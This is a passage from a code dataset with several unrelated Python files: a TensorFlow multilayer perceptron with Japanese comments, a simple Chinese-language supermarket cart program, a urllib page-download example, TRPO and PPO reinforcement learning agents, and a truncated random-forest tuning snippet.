\r\n h1 : 1 つ目の隠れ層のユニット数、h2 : 2 つ目の隠れ層のユニット数、...\r\n _n_outputLayer : int\r\n 出力層のノード数\r\n\r\n _weights : list \r\n モデルの各層の重みの Variable からなる list\r\n _biases : list \r\n モデルの各層のバイアス項の Variable からなる list\r\n\r\n _epochs : int\r\n エポック数(トレーニング回数)\r\n _batch_size : int\r\n ミニバッチ学習でのバッチサイズ\r\n\r\n _losses_train : list \r\n トレーニングデータでの損失関数の値の list\r\n\r\n _activate_hiddenLayer : NNActivatation クラス\r\n 隠れ層からの活性化関数の種類\r\n _activate_outputLayer : NNActivatation クラス\r\n 出力層からの活性化関数\r\n \r\n _X_holder : placeholder\r\n 入力層にデータを供給するための placeholder\r\n _t_holder : placeholder\r\n 出力層に教師データを供給するための placeholder\r\n _keep_prob_holder : placeholder\r\n ドロップアウトしない確率 (1-p) にデータを供給するための placeholder\r\n \r\n [protedted] protedted な使用法を想定 \r\n\r\n [private] 変数名の前にダブルアンダースコア __ を付ける(Pythonルール)\r\n\r\n \"\"\"\r\n\r\n def __init__( \r\n self, \r\n session = tf.Session(), \r\n n_inputLayer = 1, n_hiddenLayers = [1,1,1], n_outputLayer = 1, \r\n activate_hiddenLayer = NNActivation(),\r\n activate_outputLayer = NNActivation(),\r\n epochs = 1000,\r\n batch_size = 1 \r\n ):\r\n \"\"\"\r\n コンストラクタ(厳密にはイニシャライザ)\r\n \"\"\"\r\n super().__init__( session )\r\n \r\n tf.set_random_seed(12)\r\n \r\n # 引数で指定された Session を設定\r\n self._session = session\r\n\r\n # 各パラメータの初期化\r\n self._n_inputLayer = n_inputLayer\r\n self._n_hiddenLayers = n_hiddenLayers\r\n self._n_outputLayer = n_outputLayer\r\n\r\n self._weights = []\r\n self._biases = []\r\n\r\n self._activate_hiddenLayer = activate_hiddenLayer\r\n self._activate_outputLayer = activate_outputLayer\r\n\r\n self._epochs = epochs\r\n self._batch_size = batch_size\r\n\r\n # evaluate 関連の初期化\r\n self._losses_train = []\r\n \r\n # placeholder の初期化\r\n # shape の列(横方向)は、各層の次元(ユニット数)に対応させる。\r\n # shape の行は、None にして汎用性を確保\r\n self._X_holder = tf.placeholder( tf.float32, shape = [None, self._n_inputLayer] )\r\n self._t_holder = tf.placeholder( tf.float32, shape = [None, self._n_outputLayer] )\r\n self._keep_prob_holder = tf.placeholder( tf.float32 )\r\n\r\n return\r\n \r\n def print( self, str ):\r\n print( \"----------------------------------\" )\r\n print( \"MultilayerPerceptron\" )\r\n print( self )\r\n print( str )\r\n\r\n print( \"_session : \", self._session )\r\n print( \"_init_var_op :\\n\", self._init_var_op )\r\n print( \"_loss_op :\", self._loss_op )\r\n print( \"_optimizer :\", self._optimizer )\r\n print( \"_train_step :\", self._train_step )\r\n print( \"_y_out_op :\", self._y_out_op )\r\n\r\n print( \"_epoches :\", self._epochs )\r\n print( \"_batch_size :\", self._batch_size )\r\n\r\n print( \"_n_inputLayer : \", self._n_inputLayer )\r\n print( \"_n_hiddenLayers : \", self._n_hiddenLayers )\r\n print( \"_n_outputLayer : \", self._n_outputLayer )\r\n print( \"_activate_hiddenLayer :\", self._activate_hiddenLayer )\r\n print( \"_activate_outputLayer :\", self._activate_outputLayer )\r\n\r\n print( \"_X_holder : \", self._X_holder )\r\n print( \"_t_holder : \", self._t_holder )\r\n print( \"_keep_prob_holder : \", self._keep_prob_holder )\r\n\r\n print( \"_weights : \\n\", self._weights )\r\n print( self._session.run( self._weights ) )\r\n\r\n print( \"_biases : \\n\", self._biases )\r\n print( self._session.run( self._biases ) )\r\n\r\n print( \"----------------------------------\" )\r\n return\r\n \r\n\r\n def init_weight_variable( self, input_shape ):\r\n \"\"\"\r\n 重みの初期化を行う。\r\n 重みは TensorFlow の Variable で定義することで、\r\n 学習過程(最適化アルゴリズム Optimizer の session.run(...))で自動的に TensorFlow により、変更される値となる。\r\n\r\n [Input]\r\n input_shape : [int,int]\r\n 重みの Variable を初期化するための Tensor 
の形状\r\n\r\n [Output]\r\n 正規分布に基づく乱数で初期化された重みの Variable \r\n session.run(...) はされていない状態。\r\n \"\"\"\r\n\r\n # ゼロで初期化すると、うまく重みの更新が出来ないので、正規分布に基づく乱数で初期化\r\n # tf.truncated_normal(...) : Tensor を正規分布なランダム値で初期化する\r\n init_tsr = tf.truncated_normal( shape = input_shape, stddev = 0.01 )\r\n\r\n # 重みの Variable\r\n weight_var = tf.Variable( init_tsr )\r\n \r\n return weight_var\r\n\r\n\r\n def init_bias_variable( self, input_shape ):\r\n \"\"\"\r\n バイアス項 b の初期化を行う。\r\n バイアス項は TensorFlow の Variable で定義することで、\r\n 学習過程(最適化アルゴリズム Optimizer の session.run(...))で自動的に TensorFlow により、変更される値となる。\r\n\r\n [Input]\r\n input_shape : [int,int]\r\n バイアス項の Variable を初期化するための Tensor の形状\r\n\r\n [Output]\r\n ゼロ初期化された重みの Variable \r\n session.run(...) はされていない状態。\r\n \"\"\"\r\n\r\n #init_tsr = tf.zeros( shape = input_shape )\r\n init_tsr = tf.random_normal( shape = input_shape )\r\n\r\n # バイアス項の Variable\r\n bias_var = tf.Variable( init_tsr )\r\n\r\n return bias_var\r\n\r\n\r\n def model( self ):\r\n \"\"\"\r\n モデルの定義(計算グラフの構築)を行い、\r\n 最終的なモデルの出力のオペレーターを設定する。\r\n\r\n [Output]\r\n self._y_out_op : Operator\r\n モデルの出力のオペレーター\r\n \"\"\"\r\n # 計算グラフの構築\r\n #print( \"len( _n_hiddenLayers ) : \", len( self._n_hiddenLayers ) )\r\n #print( \"len( [_n_hiddenLayers] ) : \", len( [self._n_hiddenLayers] ) )\r\n #print( \"_n_hiddenLayers\", self._n_hiddenLayers.shape )\r\n #print( \"_n_hiddenLayers\", self._n_hiddenLayers.shape[0] )\r\n\r\n #--------------------------------------------------------------\r\n # 隠れ層が1つのみの場合\r\n #--------------------------------------------------------------\r\n if ( len( self._n_hiddenLayers ) == 1 ):\r\n # 入力層 ~ 隠れ層\r\n self._weights.append( self.init_weight_variable( input_shape = [self._n_inputLayer, self._n_hiddenLayers[0] ] ) )\r\n self._biases.append( self.init_bias_variable( input_shape = [self._n_hiddenLayers[0]] ) )\r\n\r\n # 隠れ層への入力 : h_in = W*x + b\r\n h_in_op = tf.matmul( self._X_holder, self._weights[0] ) + self._biases[0]\r\n \r\n # 隠れ層からの出力\r\n h_out_op = self._activate_hiddenLayer.activate( h_in_op )\r\n #h_out_op = tf.nn.sigmoid( h_in_op )\r\n #print( \"activate function [hidden layer] = sigmoid\" )\r\n\r\n # 隠れ層 ~ 出力層\r\n self._weights.append( self.init_weight_variable( input_shape = [self._n_hiddenLayers[0], self._n_outputLayer] ) )\r\n self._biases.append( self.init_bias_variable( input_shape = [self._n_outputLayer] ) )\r\n \r\n #--------------------------------------------------------------\r\n # 隠れ層が複数個ある場合\r\n #--------------------------------------------------------------\r\n else:\r\n # i=0 : 入力層 ~ 隠れ層\r\n # i=1,2... 
: 隠れ層 ~ 隠れ層\r\n            for (i, n_hidden) in enumerate( self._n_hiddenLayers ):\r\n                # 入力層 ~ 隠れ層\r\n                if (i==0):\r\n                    input_dim = self._n_inputLayer\r\n                    input_holder = self._X_holder\r\n\r\n                # 隠れ層 ~ 隠れ層\r\n                else:\r\n                    input_dim = self._n_hiddenLayers[i-1]\r\n                    input_holder = h_out_op\r\n\r\n                # 重みの Variable の list に、入力層 ~ 隠れ層 or 隠れ層 ~ 隠れ層の重みを追加\r\n                self._weights.append( self.init_weight_variable( input_shape = [input_dim, n_hidden] ) )\r\n\r\n                # バイアス項の Variable の list に、入力層 ~ 隠れ層 or 隠れ層 ~ 隠れ層のバイアス項を追加\r\n                self._biases.append( self.init_bias_variable( input_shape = [n_hidden] ) )\r\n\r\n                # 隠れ層への入力 : h_in = W*x + b\r\n                h_in_op = tf.matmul( input_holder, self._weights[-1] ) + self._biases[-1]\r\n\r\n                # 隠れ層からの出力\r\n                h_out_op = self._activate_hiddenLayer.activate( h_in_op )\r\n                #h_out_op = tf.nn.sigmoid( h_in_op )\r\n                #print( \"activate function [hidden layer] = sigmoid\" )\r\n                #h_out_op = tf.nn.relu( h_in_op )\r\n                #print( \"activate function [hidden layer] = Relu\" )\r\n\r\n            # ドロップアウト処理\r\n            #output_holder = tf.nn.dropout( h_out_op, self._keep_prob_holder )\r\n            #output_holder = h_out_op\r\n            \r\n            # 隠れ層 ~ 出力層\r\n            self._weights.append( self.init_weight_variable( input_shape = [self._n_hiddenLayers[-1], self._n_outputLayer] ) )\r\n            self._biases.append( self.init_bias_variable( input_shape = [self._n_outputLayer] ) )\r\n\r\n\r\n        #--------------------------------------------------------------\r\n        # 出力層への入力\r\n        #--------------------------------------------------------------\r\n        y_in_op = tf.matmul( h_out_op, self._weights[-1] ) + self._biases[-1]\r\n\r\n        #--------------------------------------------------------------\r\n        # モデルの出力\r\n        #--------------------------------------------------------------\r\n        self._y_out_op = self._activate_outputLayer.activate( y_in_op )\r\n        \r\n        # 2分類問題の場合\r\n        # sigmoid\r\n        #self._y_out_op = tf.nn.sigmoid( y_in_op )\r\n        #print( \"activate function [output layer] = sigmoid\" )\r\n        \r\n        # Relu\r\n        #self._y_out_op = tf.nn.relu( y_in_op )\r\n        #print( \"activate function [output layer] = Relu\" )\r\n\r\n        # 多分類問題の場合\r\n        # softmax\r\n        #self._y_out_op = tf.nn.softmax( y_in_op )\r\n        #print( \"activate function [output layer] = softmax\" )\r\n\r\n        return self._y_out_op\r\n\r\n    \r\n    def loss( self, nnLoss ):\r\n        \"\"\"\r\n        損失関数の定義を行う。\r\n        \r\n        [Input]\r\n            nnLoss : NNLoss クラスのオブジェクト\r\n        \r\n        [Output]\r\n            self._loss_op : Operator\r\n                損失関数を表すオペレーター\r\n        \"\"\"\r\n        self._loss_op = nnLoss.loss( t_holder = self._t_holder, y_out_op = self._y_out_op )\r\n        \r\n        return self._loss_op\r\n\r\n\r\n    def optimizer( self, nnOptimizer ):\r\n        \"\"\"\r\n        モデルの最適化アルゴリズムの設定を行う。\r\n        [Input]\r\n            nnOptimizer : NNOptimizer のクラスのオブジェクト\r\n\r\n        [Output]\r\n            optimizer の train_step\r\n        \"\"\"\r\n        self._optimizer = nnOptimizer._optimizer\r\n        self._train_step = nnOptimizer.train_step( self._loss_op )\r\n        \r\n        return self._train_step\r\n\r\n\r\n    def fit( self, X_train, y_train ):\r\n        \"\"\"\r\n        指定されたトレーニングデータで、モデルの fitting 処理を行う。\r\n\r\n        [Input]\r\n            X_train : numpy.ndarray ( shape = [n_samples, n_features] )\r\n                トレーニングデータ(特徴行列)\r\n            \r\n            y_train : numpy.ndarray ( shape = [n_samples] )\r\n                トレーニングデータ用のクラスラベル(教師データ)のリスト\r\n\r\n        [Output]\r\n            self : 自身のオブジェクト\r\n        \"\"\"\r\n        # TensorFlow 用にデータを reshape\r\n        #y_train.reshape( [len(y_train), 1] )\r\n\r\n        #----------------------------\r\n        # 学習開始処理\r\n        #----------------------------\r\n        # Variable の初期化オペレーター\r\n        self._init_var_op = tf.global_variables_initializer()\r\n\r\n        # Session の run(初期化オペレーター)\r\n        self._session.run( self._init_var_op )\r\n        \r\n        #print( \"init_weights\", self._session.run( 
self._weights ) )\r\n\r\n #-------------------\r\n # 学習処理\r\n #-------------------\r\n n_batches = len( X_train ) // self._batch_size # バッチ処理の回数\r\n\r\n # for ループでエポック数分トレーニング\r\n for epoch in range( self._epochs ):\r\n # ミニバッチ学習処理のためランダムサンプリング\r\n X_train_shuffled, y_train_shuffled = shuffle( X_train, y_train )\r\n \r\n # 2クラス分類の場合\r\n if (self._n_outputLayer == 1):\r\n # shape を placeholder の形状に合わせるためにするため [...] で囲み、transpose() する。\r\n # shape を (n_samples, → (n_samples,1) に reshape\r\n y_train_shuffled = numpy.transpose( [ y_train_shuffled ] )\r\n \r\n for i in range( n_batches ):\r\n it_start = i * self._batch_size\r\n it_end = it_start + self._batch_size\r\n\r\n self._session.run(\r\n self._train_step,\r\n feed_dict = {\r\n self._X_holder: X_train_shuffled[it_start:it_end],\r\n self._t_holder: y_train_shuffled[it_start:it_end]\r\n }\r\n )\r\n\r\n # 損失関数の値をストック\r\n # 2クラス分類の場合\r\n if (self._n_outputLayer == 1):\r\n # shape を (n_samples, → (n_samples,1) に reshape\r\n loss = self._loss_op.eval(\r\n session = self._session,\r\n feed_dict = {\r\n self._X_holder: X_train,\r\n self._t_holder: numpy.transpose( [ y_train ] )\r\n }\r\n )\r\n # 多クラス分類の場合\r\n else:\r\n loss = self._loss_op.eval(\r\n session = self._session,\r\n feed_dict = {\r\n self._X_holder: X_train,\r\n self._t_holder: y_train\r\n }\r\n )\r\n\r\n self._losses_train.append( loss )\r\n\r\n return self._y_out_op\r\n\r\n\r\n def predict( self, X_test ):\r\n \"\"\"\r\n fitting 処理したモデルで、推定を行い、予想クラスラベル値を返す。\r\n\r\n [Input]\r\n X_test : numpy.ndarry ( shape = [n_samples, n_features] )\r\n 予想したい特徴行列\r\n\r\n [Output]\r\n results : numpy.ndarry ( shape = [n_samples] )\r\n 予想結果(分類モデルの場合は、クラスラベル)\r\n \"\"\"\r\n # 出力層の活性化関数が sigmoid のとき(2クラスの識別)\r\n if ( self._activate_outputLayer._node_name == \"Activate_Sigmoid_op\" ):\r\n predict_op = tf.to_int64( tf.greater( self._y_out_op, 0.5 ) )\r\n # 出力層の活性化関数が softmax のとき(多クラスの識別)\r\n elif ( self._activate_outputLayer._node_name == \"Activate_Softmax_op\" ):\r\n predict_op = tf.arg_max( input = self._y_out_op, dimension = 1 )\r\n else:\r\n predict_op = tf.to_int64( tf.greater( self._y_out_op, 0.5 ) )\r\n\r\n predict = predict_op.eval( \r\n session = self._session,\r\n feed_dict = {\r\n self._X_holder: X_test\r\n }\r\n )\r\n \r\n \r\n return predict\r\n\r\n\r\n def predict_proba( self, X_test ):\r\n \"\"\"\r\n fitting 処理したモデルで、推定を行い、クラスの所属確率の予想値を返す。\r\n proba : probability\r\n\r\n [Input]\r\n X_test : numpy.ndarry ( shape = [n_samples, n_features] )\r\n 予想したい特徴行列\r\n \"\"\"\r\n prob = self._y_out_op.eval(\r\n session = self._session,\r\n feed_dict = {\r\n self._X_holder: X_test \r\n }\r\n )\r\n\r\n # X_test のデータ数、特徴数に応じて reshape\r\n #prob = prob.reshape( (len[X_test], len[X_test[0]]) )\r\n\r\n return prob\r\n\r\n\r\n def accuracy( self, X_test, y_test):\r\n \"\"\"\r\n 指定したデータでの正解率 [accuracy] を計算する。\r\n \"\"\"\r\n # 出力層の活性化関数が sigmoid のとき(2クラスの識別)\r\n if ( self._activate_outputLayer._node_name == \"Activate_Sigmoid_op\" ):\r\n correct_predict_op = tf.equal( \r\n tf.to_float( tf.greater( self._y_out_op, 0.5 ) ), \r\n self._t_holder \r\n )\r\n # 出力層の活性化関数が softmax のとき(多クラスの識別)\r\n elif ( self._activate_outputLayer._node_name == \"Activate_Softmax_op\" ):\r\n correct_predict_op = tf.equal(\r\n tf.arg_max( self._y_out_op, dimension = 1 ),\r\n tf.arg_max( self._t_holder, dimension = 1 )\r\n )\r\n else:\r\n correct_predict_op = tf.equal( \r\n tf.to_float( tf.greater( self._y_out_op, 0.5 ) ), \r\n self._t_holder \r\n )\r\n\r\n # correct_predict_op は、feed_dict で与えるデータ分(全データ)の結果(合っていた数)を返すので、\r\n # 
tf.reduce_mean(..) でその平均値を計算すれば、合っていた数 / 全データ数 = 正解率 が求まる。\r\n accuracy_op = tf.reduce_mean( tf.cast( correct_predict_op, tf.float32 ) )\r\n \r\n # 2クラス分類の場合\r\n if (self._n_outputLayer == 1):\r\n # shape を (n_samples, → (n_samples,1) に reshape\r\n y_test = numpy.transpose( [ y_test ] )\r\n\r\n accuracy = accuracy_op.eval(\r\n session = self._session,\r\n feed_dict = {\r\n self._X_holder: X_test,\r\n self._t_holder: y_test\r\n } \r\n )\r\n\r\n return accuracy\r\n","sub_path":"MultilayerPerceptron_TensorFlow/MultilayerPerceptron.py","file_name":"MultilayerPerceptron.py","file_ext":"py","file_size_in_byte":21942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"316235504","text":"# 定义仓库\nrepository = dict()\n# 定义购物清单对象\n# mock shop_list = [('10001', 4)]\nshop_list = []\n\n# 初始化商品\ndef init_repo():\n goods1 = (\"10001\", \"馒头\", 88.0)\n goods2 = (\"10002\", \"花卷\", 68.0)\n goods3 = ('10003', \"包子\", 87)\n goods4 = ('10004', '牛腩', 39)\n goods5 = ('10005', '鸡蛋', 13)\n goods6 = ('10006', '米饭', 50)\n # 入库 ,条码做key\n repository[goods1[0]] = goods1\n repository[goods2[0]] = goods2\n repository[goods3[0]] = goods3\n repository[goods4[0]] = goods4\n repository[goods5[0]] = goods5\n repository[goods6[0]] = goods6\n\n\ndef show_goods():\n print('\\n')\n print('♡'*32 + ' 欢迎光临馒头便利店 '+'♡'*32+'\\n')\n print('馒头便利店的商品清单:')\n print('%13s%40s%10s' % ('条码', '商品名称', '单价'))\n # 遍历所有list列表\n for goods in repository.values():\n print('%15s%40s%13s' % goods)\n\n\ndef show_list():\n print('=' * 100)\n if not shop_list:\n print('购物车为空')\n else:\n title = \"%-5s|%15s|%40s|%10s|%4s|%10s\" % \\\n ('ID', '条码', '商品名称', '单价', '数量', '小计')\n print(title)\n print('-'*100)\n # 计算总价价格\n sum = 0\n for i, item in enumerate(shop_list):\n # 转换商品id为索引+1\n id = i + 1\n # 获取该购物明细的第一个元素:商品条码\n code = '10001'\n # repository[条码,key值][元组序号] 对应key的元组的内容\n # 获取商品名和单价\n name = repository[code][1]\n price = repository[code][2]\n # 获取要购买的数量\n number = item[1]\n amount = number * price\n # 总计\n sum = sum + amount\n # line\n line = \"%-5s|%17s|%41s|%12s|%6s|%12s\" % \\\n (id, code, name, price, number, amount)\n print(line)\n print('-'*100)\n print(\" 总计\", sum)\n print('='*100)\n\n\ndef add():\n # 输入条码\n code = input('请输入条码:\\n')\n if code not in repository:\n print(\"条码不存在\")\n return\n # 根据条码查找商品\n # goods = repository[code]\n # 等待输入数量\n number = input(\"请输入购买数量:\\n\")\n shop_list.append([code, int(number)])\n\n\ndef edit():\n id = input('请输入编辑商品的id')\n index = int(id) - 1\n item = shop_list[index] # python列表复制均为引用,故复制后的改变原有的也改变\n print(shop_list)\n number = input('请输入新的数量: \\n')\n item[1] = int(number)\n\n\ndef delete():\n id = input('请输入要删除的id')\n index = id - 1\n item = shop_list[index]\n print(shop_list)\n del shop_list[index]\n\n\ndef payment():\n # 先打印清单\n show_list()\n print('\\n'*3)\n print('欢迎下次光临')\n import os\n os._exit(0)\n\n\ncmd_dict = {'a': add, 'e': edit, 'd': delete, 'p': payment, 's': show_goods}\n\n\ndef show_conmmand():\n cmd = input('请输入操作指令:\\n' +\n \"添加(a) 修改(e) 删除(d) 结算(p) 超市商品(s) \\n\")\n if cmd not in cmd_dict:\n print('wrong')\n else:\n cmd_dict[cmd]()\n\n\ninit_repo()\nshow_goods()\n\nwhile True:\n # 为了能循环进行,使用while\n show_list()\n show_conmmand()\n\n\n# init_repo()\n# show_goods()\n# show_list()\n# add()\n# show_list()\n# edit()\n# show_list()\n# # show_goods()\n# # 
print(repository['10001'])\n\n\n","sub_path":"crazy_python/chapter4/supermarket.py","file_name":"supermarket.py","file_ext":"py","file_size_in_byte":3549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"232147425","text":"import urllib.request as req\n\n# google.com 메인 페이지 소스 다운로드\nurl = \"https://www.google.com/\"\n\n# 다운로드 받을 파일 지정\nsave_url = \"d:/google.html\"\n\ntry:\n file1, header1 = req.urlretrieve(url, save_url)\nexcept Exception as e:\n print(e)\nelse:\n print(header1) # HTTPMessage\n print(\"성공\")\n","sub_path":"urllib/urlretrieve1.py","file_name":"urlretrieve1.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"569765975","text":"import numpy as np\nfrom tqdm import tqdm\n\nimport torch\nimport torch.nn.functional as F\n\nfrom mushroom.algorithms.agent import Agent\nfrom mushroom.approximators import Regressor\nfrom mushroom.approximators.parametric import TorchApproximator\nfrom mushroom.utils.torch import get_gradient, zero_grad\nfrom mushroom.utils.minibatches import minibatch_generator\nfrom mushroom.utils.dataset import parse_dataset, compute_J\n\n\ndef compute_gae(V, s, ss, r, absorbing, last, gamma, lam):\n v = V(s)\n v_next = V(ss)\n gen_adv = np.empty_like(v)\n for rev_k, _ in enumerate(reversed(v)):\n k = len(v) - rev_k - 1\n if last[k] or rev_k == 0:\n gen_adv[k] = r[k] - v[k]\n if not absorbing[k]:\n gen_adv[k] += gamma * v_next[k]\n else:\n gen_adv[k] = r[k] + gamma * v_next[k] - v[k] + gamma * lam * gen_adv[k + 1]\n return gen_adv + v, gen_adv\n\n\nclass TRPO(Agent):\n def __init__(self, mdp_info, policy, critic_params,\n ent_coeff=0., max_kl=.001, lam=1.,\n n_epochs_line_search=10, n_epochs_cg=10,\n cg_damping=1e-2, cg_residual_tol=1e-10, quiet=True,\n critic_fit_params=None):\n \"\"\"\n Constructor.\n\n Args:\n\n\n \"\"\"\n self._critic_fit_params = dict(n_epochs=3) if critic_fit_params is None else critic_fit_params\n\n self._n_epochs_line_search = n_epochs_line_search\n self._n_epochs_cg = n_epochs_cg\n self._cg_damping = cg_damping\n self._cg_residual_tol = cg_residual_tol\n\n self._max_kl = max_kl\n self._ent_coeff = ent_coeff\n\n self._lambda = lam\n\n self._V = Regressor(TorchApproximator, **critic_params)\n\n self._iter = 1\n self._quiet = quiet\n\n super().__init__(policy, mdp_info, None)\n\n def fit(self, dataset):\n if not self._quiet:\n tqdm.write('Iteration ' + str(self._iter))\n\n state, action, reward, next_state, absorbing, last = parse_dataset(dataset)\n x = state.astype(np.float32)\n u = action.astype(np.float32)\n r = reward.astype(np.float32)\n xn = next_state.astype(np.float32)\n\n obs = torch.tensor(x, dtype=torch.float)\n act = torch.tensor(u, dtype=torch.float)\n v_target, np_adv = compute_gae(self._V, x, xn, r, absorbing, last,\n self.mdp_info.gamma, self._lambda)\n np_adv = (np_adv - np.mean(np_adv)) / (np.std(np_adv) + 1e-8)\n adv = torch.tensor(np_adv, dtype=torch.float)\n\n # Policy update\n old_pol_dist = self.policy.distribution_t(obs)\n old_log_prob = self.policy.log_prob_t(obs, act).detach()\n\n self._zero_grad()\n loss = self._compute_loss(obs, act, adv, old_log_prob)\n\n prev_loss = loss.item()\n\n # Compute Gradient\n loss.backward(retain_graph=True)\n g = get_gradient(self.policy.parameters())\n\n # Compute direction trough conjugate gradient\n stepdir = self._conjugate_gradient(g, obs, old_pol_dist)\n\n # Line search\n shs = .5 * stepdir.dot(self._fisher_vector_product(\n 
torch.from_numpy(stepdir), obs, old_pol_dist)\n )\n lm = np.sqrt(shs / self._max_kl)\n fullstep = stepdir / lm\n stepsize = 1.\n\n theta_old = self.policy.get_weights()\n\n violation = True\n\n for _ in range(self._n_epochs_line_search):\n theta_new = theta_old + fullstep * stepsize\n self.policy.set_weights(theta_new)\n\n new_loss = self._compute_loss(obs, act, adv, old_log_prob)\n kl = self._compute_kl(obs, old_pol_dist)\n improve = new_loss - prev_loss\n if kl <= self._max_kl * 1.5 or improve >= 0:\n violation = False\n break\n stepsize *= .5\n\n if violation:\n self.policy.set_weights(theta_old)\n\n # VF update\n self._V.fit(x, v_target, **self._critic_fit_params)\n\n # Print fit information\n self._print_fit_info(dataset, x, v_target, old_pol_dist)\n self._iter += 1\n\n def _zero_grad(self):\n zero_grad(self.policy.parameters())\n\n def _conjugate_gradient(self, b, obs, old_pol_dist):\n p = b.detach().numpy()\n r = b.detach().numpy()\n x = np.zeros_like(b)\n rdotr = r.dot(r)\n\n for i in range(self._n_epochs_cg):\n z = self._fisher_vector_product(\n torch.from_numpy(p), obs, old_pol_dist).detach().numpy()\n v = rdotr / p.dot(z)\n x += v * p\n r -= v * z\n newrdotr = r.dot(r)\n mu = newrdotr / rdotr\n p = r + mu * p\n\n rdotr = newrdotr\n if rdotr < self._cg_residual_tol:\n break\n return x\n\n def _fisher_vector_product(self, p, obs, old_pol_dist):\n self._zero_grad()\n kl = self._compute_kl(obs, old_pol_dist)\n grads = torch.autograd.grad(kl, self.policy.parameters(),\n create_graph=True, retain_graph=True)\n flat_grad_kl = torch.cat([grad.view(-1) for grad in grads])\n\n kl_v = (flat_grad_kl * torch.autograd.Variable(p)).sum()\n grads = torch.autograd.grad(kl_v, self.policy.parameters(),\n retain_graph=True)\n flat_grad_grad_kl = torch.cat(\n [grad.contiguous().view(-1) for grad in grads]).data\n\n return flat_grad_grad_kl + p * self._cg_damping\n\n def _compute_kl(self, obs, old_pol_dist):\n new_pol_dist = self.policy.distribution_t(obs)\n return torch.mean(torch.distributions.kl.kl_divergence(new_pol_dist,\n old_pol_dist))\n\n def _compute_loss(self, obs, act, adv, old_log_prob):\n ratio = torch.exp(self.policy.log_prob_t(obs, act) - old_log_prob)\n J = torch.mean(ratio * adv)\n\n return J + self._ent_coeff * self.policy.entropy_t(obs)\n\n def _print_fit_info(self, dataset, x, v_target, old_pol_dist):\n if not self._quiet:\n logging_verr = []\n torch_v_targets = torch.tensor(v_target, dtype=torch.float)\n for idx in range(len(self._V)):\n v_pred = torch.tensor(self._V(x, idx=idx), dtype=torch.float)\n v_err = F.mse_loss(v_pred, torch_v_targets)\n logging_verr.append(v_err.item())\n\n logging_ent = self.policy.entropy(x)\n new_pol_dist = self.policy.distribution(x)\n logging_kl = torch.mean(\n torch.distributions.kl.kl_divergence(new_pol_dist, old_pol_dist)\n )\n avg_rwd = np.mean(compute_J(dataset))\n tqdm.write(\"Iterations Results:\\n\\trewards {} vf_loss {}\\n\\tentropy {} kl {}\".format(\n avg_rwd, logging_verr, logging_ent, logging_kl))\n tqdm.write(\n '--------------------------------------------------------------------------------------------------')\n\n\nclass PPO(Agent):\n def __init__(self, mdp_info, policy, critic_params, actor_optimizer,\n n_epochs_policy, batch_size, eps_ppo, lam, quiet=True,\n critic_fit_params=None):\n self._critic_fit_params = dict(n_epochs=10) if critic_fit_params is None else critic_fit_params\n\n self._n_epochs_policy = n_epochs_policy\n self._batch_size = batch_size\n self._eps_ppo = eps_ppo\n\n self._optimizer = 
actor_optimizer['class'](policy.parameters(), **actor_optimizer['params'])\n\n self._lambda = lam\n\n self._V = Regressor(TorchApproximator, **critic_params)\n\n self._quiet = quiet\n self._iter = 1\n\n super().__init__(policy, mdp_info, None)\n\n def fit(self, dataset):\n if not self._quiet:\n tqdm.write('Iteration ' + str(self._iter))\n\n x, u, r, xn, absorbing, last = parse_dataset(dataset)\n x = x.astype(np.float32)\n u = u.astype(np.float32)\n r = r.astype(np.float32)\n xn = xn.astype(np.float32)\n\n obs = torch.tensor(x, dtype=torch.float)\n act = torch.tensor(u, dtype=torch.float)\n v_target, np_adv = compute_gae(self._V, x, xn, r, absorbing, last, self.mdp_info.gamma, self._lambda)\n np_adv = (np_adv - np.mean(np_adv)) / (np.std(np_adv) + 1e-8)\n adv = torch.tensor(np_adv, dtype=torch.float)\n\n old_pol_dist = self.policy.distribution_t(obs)\n old_log_p = old_pol_dist.log_prob(act)[:, None].detach()\n\n self._V.fit(x, v_target, **self._critic_fit_params)\n\n self._update_policy(obs, act, adv, old_log_p)\n\n # Print fit information\n self._print_fit_info(dataset, x, v_target, old_pol_dist)\n self._iter += 1\n\n def _update_policy(self, obs, act, adv, old_log_p):\n for epoch in range(self._n_epochs_policy):\n for obs_i, act_i, adv_i, old_log_p_i in minibatch_generator(\n self._batch_size, obs, act, adv, old_log_p):\n self._optimizer.zero_grad()\n prob_ratio = torch.exp(\n self.policy.log_prob_t(obs_i, act_i) - old_log_p_i\n )\n clipped_ratio = torch.clamp(prob_ratio, 1 - self._eps_ppo,\n 1 + self._eps_ppo)\n loss = -torch.mean(torch.min(prob_ratio * adv_i,\n clipped_ratio * adv_i))\n loss.backward()\n self._optimizer.step()\n\n def _print_fit_info(self, dataset, x, v_target, old_pol_dist):\n if not self._quiet:\n logging_verr = []\n torch_v_targets = torch.tensor(v_target, dtype=torch.float)\n for idx in range(len(self._V)):\n v_pred = torch.tensor(self._V(x, idx=idx), dtype=torch.float)\n v_err = F.mse_loss(v_pred, torch_v_targets)\n logging_verr.append(v_err.item())\n\n logging_ent = self.policy.entropy(x)\n new_pol_dist = self.policy.distribution(x)\n logging_kl = torch.mean(torch.distributions.kl.kl_divergence(\n new_pol_dist, old_pol_dist))\n avg_rwd = np.mean(compute_J(dataset))\n tqdm.write(\"Iterations Results:\\n\\trewards {} vf_loss {}\\n\\tentropy {} kl {}\".format(\n avg_rwd, logging_verr, logging_ent, logging_kl))\n tqdm.write(\n '--------------------------------------------------------------------------------------------------')\n","sub_path":"mushroom/algorithms/actor_critic/trust_region.py","file_name":"trust_region.py","file_ext":"py","file_size_in_byte":10504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"261452813","text":"from parser import *\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import metrics\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import GridSearchCV\n\n# tuned using GridSearchCV\ndef tune_random_forest(train_d, test_d, params):\n\n Xtr = getData(train_d)\n ytr = getLabels(train_d)\n Xte = getData(test_d)\n yte = getLabels(test_d)\n\n rf = RandomForestClassifier()\n clf = GridSearchCV(rf, params)\n clf.fit(Xtr, ytr)\n pred = clf.predict(Xte)\n print(f'tuned: {metrics.accuracy_score(yte, pred)}')\n\n return pred\n\n\ndef run_random_forest(train_d, test_d, n_estimators=100):\n Xtr = getData(train_d)\n ytr 